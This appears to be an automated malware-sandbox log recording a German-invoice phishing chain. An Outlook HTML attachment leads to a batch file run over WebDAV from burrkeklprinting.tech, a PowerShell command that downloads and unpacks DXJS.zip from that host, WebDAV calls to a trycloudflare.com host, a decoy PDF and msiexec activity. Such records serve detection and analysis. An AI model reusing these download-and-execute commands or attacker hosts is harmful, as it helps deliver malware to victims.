                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "EA78F63D-11D0-470A-A737-D7B520A02F95" "4CE9D7BA-5FF5-4189-92A5-D6CD5249FA96" "7112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1924,i,12067397372668068014,3130957219251823397,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "EA78F63D-11D0-470A-A737-D7B520A02F95" "4CE9D7BA-5FF5-4189-92A5-D6CD5249FA96" "7112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\2SB9MLRC\Rechnung Nr. 17735360.html
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1924,i,12067397372668068014,3130957219251823397,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://burrkeklprinting.tech:7119/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie string-neural-inspiration-polo.trycloudflare.com@SSL https://string-neural-inspiration-polo.trycloudflare.com/E_SCAN_DOC
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2272 --field-trial-handle=1576,i,1401745277560041960,6135997636573201547,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download"
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding C0D5B03155E81B557829AC0D3F558D41
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie burrkeklprinting.tech@4098 http://burrkeklprinting.tech:4098/new.bat
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2272 --field-trial-handle=1576,i,1401745277560041960,6135997636573201547,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: duser.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: smartscreenps.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: shdocvw.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: pcacli.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
